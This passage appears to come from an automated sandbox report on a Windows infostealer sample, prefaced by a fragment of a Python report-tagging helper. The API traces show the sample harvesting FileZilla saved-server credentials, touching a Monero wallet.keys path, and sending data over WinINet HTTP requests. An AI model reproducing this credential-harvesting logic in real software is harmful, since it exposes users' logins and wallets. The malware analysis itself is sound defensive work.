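    return {r.opcode_id: t for r in parse_report(text) if (t := tag_record(r))}
```

Feed summarize the text of a full exported report to list every function by Opcode ID with its tags; the Opcode ID is stable across runs of the same sample, so the tags can be diffed against a second analysis. Arguments the sandbox prints as "?" are treated as unknown rather than as zero, so a NULL entropy pointer is only reported when the report actually resolved it.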
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: My F
                    • API String ID: 0-421645348
                    • Opcode ID: 42328410bdaaaec99b2a5d9c00073069868d81ec34532b7048c1fbb839f82a08
                    • Instruction ID: d2ebbbc970ad5170afdb49a210b8e04db02e2d9ac995a6e90ac28a2e64ae675e
                    • Opcode Fuzzy Hash: 42328410bdaaaec99b2a5d9c00073069868d81ec34532b7048c1fbb839f82a08
                    • Instruction Fuzzy Hash: B57106B35086149FE3046F29DC5577AFBE5EF94320F2B492EEAC5D7680EA354840CB92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8bd9145009b2ccfa43aa7a8b3310aa9d4c8b2f90fe26d4d197177a9fe3d63ab3
                    • Instruction ID: 4686fead0cea93abaad43ed8e51a4ea4f03ad4704589be9af6fa19877b592171
                    • Opcode Fuzzy Hash: 8bd9145009b2ccfa43aa7a8b3310aa9d4c8b2f90fe26d4d197177a9fe3d63ab3
                    • Instruction Fuzzy Hash: 6271F9F3E087145BE3006E2DED8476ABBD9DB94720F1B453DDA98D3781E9798C0542D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f903312c1b2d15997ef6ef8a7c41b5eee3d6a91078d4350e4033b00f5d6216ce
                    • Instruction ID: 6f73be660f11506dcc25bb8539e40cc188240515205ee8e97fe78f03080b173a
                    • Opcode Fuzzy Hash: f903312c1b2d15997ef6ef8a7c41b5eee3d6a91078d4350e4033b00f5d6216ce
                    • Instruction Fuzzy Hash: 4071E6F39092009FE3086E29DC9577AFBE5EB94320F1B893DD9C487784EA7958458783
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b064f2393d20be698d73df10f884694e06b5b03037603c0fbf9ce2f386b042f4
                    • Instruction ID: 8ad15a2bc8406b67566ea6c8493e5ae95b088edf3d2c9fc43be15152d4445150
                    • Opcode Fuzzy Hash: b064f2393d20be698d73df10f884694e06b5b03037603c0fbf9ce2f386b042f4
                    • Instruction Fuzzy Hash: DF6146F3A082145BE7086E7CDC5977ABB95EB44320F1B463CDAC997BC4E935580482C2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aa1d98dff09924f9037a4d2cb3e6e3fc2d6e62faa04550f46f80b71f4698ca4a
                    • Instruction ID: 2693e892d55b7f12b5844fe6c66abcb70c19e6ef1f4526caeef78a542e4986b9
                    • Opcode Fuzzy Hash: aa1d98dff09924f9037a4d2cb3e6e3fc2d6e62faa04550f46f80b71f4698ca4a
                    • Instruction Fuzzy Hash: B45158F360D2049BE3047E3EDC8565AF7EAEFD8620F1A852DEA88C3744F63499058756
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8b7bdb24603c6874454604505acafdebbf7d66c0b5b230cbcc5b77ed72e4d58
                    • Instruction ID: 77a666c427d0bb4a6a9b9dc7668ee1b45afbe17e8535b6d90382cbd4dbcecfee
                    • Opcode Fuzzy Hash: f8b7bdb24603c6874454604505acafdebbf7d66c0b5b230cbcc5b77ed72e4d58
                    • Instruction Fuzzy Hash: 825127F3E082185BE3086A19EC8177AB7D9EB44710F1A453DEE89D3781E9369C0187C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a0f816eecc56066f7b7370031aa74fb1879d192067896bbd58c0886f7f80b39
                    • Instruction ID: 710f855535e877cf5013267b6f407679bbfd9c6928ef1097af1edf8e0ae674bd
                    • Opcode Fuzzy Hash: 6a0f816eecc56066f7b7370031aa74fb1879d192067896bbd58c0886f7f80b39
                    • Instruction Fuzzy Hash: D341E6F3B092049BF3046D2ADC8976ABBD7EBD4320F2B463DDA99477C0D938540A8656
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2eeea90d87fbe40ba50049200a804fd4df1859526d59554b4f88d7d665cdcf79
                    • Instruction ID: 079cc94c7a55bc571f2c8db4161bcf551302fc84c4390d81fd44949eeb317ad1
                    • Opcode Fuzzy Hash: 2eeea90d87fbe40ba50049200a804fd4df1859526d59554b4f88d7d665cdcf79
                    • Instruction Fuzzy Hash: EA4115F3E182105FF3049A29DC8436AB3D6EBD4720F2B853DEAAC83384D9795C058786
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00970DBA,00970DB7,00970DB6,00970DB3), ref: 00960362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00960369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00960385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 009603CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 009603DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00960419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00960463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 0096051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 0096054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00960562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00960571
                    • lstrcat.KERNEL32(?,url: ), ref: 00960580
                    • lstrcat.KERNEL32(?,00000000), ref: 00960593
                    • lstrcat.KERNEL32(?,00971678), ref: 009605A2
                    • lstrcat.KERNEL32(?,00000000), ref: 009605B5
                    • lstrcat.KERNEL32(?,0097167C), ref: 009605C4
                    • lstrcat.KERNEL32(?,login: ), ref: 009605D3
                    • lstrcat.KERNEL32(?,00000000), ref: 009605E6
                    • lstrcat.KERNEL32(?,00971688), ref: 009605F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00960604
                    • lstrcat.KERNEL32(?,00000000), ref: 00960617
                    • lstrcat.KERNEL32(?,00971698), ref: 00960626
                    • lstrcat.KERNEL32(?,0097169C), ref: 00960635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 0096068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: 39805b755a2160c4831d649ea8db1dc192dbb37f2cb4e9fc939f2b09a773bb8c
                    • Instruction ID: 77d4a90861eb36c463b2d7816a833c8758c512c0852eec9eb268b4ca0683eb8b
                    • Opcode Fuzzy Hash: 39805b755a2160c4831d649ea8db1dc192dbb37f2cb4e9fc939f2b09a773bb8c
                    • Instruction Fuzzy Hash: F8D10F729102089BCB04EBE4DD96EEE7778EF94700F548519F106B7091EE74AA05CFA5
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009559F8
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00955A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00955B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,005BE868,00000000,?,005BA990,00000000,?,00971A1C), ref: 00955E71
                    • lstrlen.KERNEL32(00000000), ref: 00955E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00955E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00955E9A
                    • lstrlen.KERNEL32(00000000), ref: 00955EAF
                    • lstrlen.KERNEL32(00000000), ref: 00955ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00955EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00955F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00955F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00955F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00955FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00955FBD
                    • HttpOpenRequestA.WININET(00000000,005BE818,?,005BE380,00000000,00000000,00400100,00000000), ref: 00955BF8
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • InternetCloseHandle.WININET(00000000), ref: 00955FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
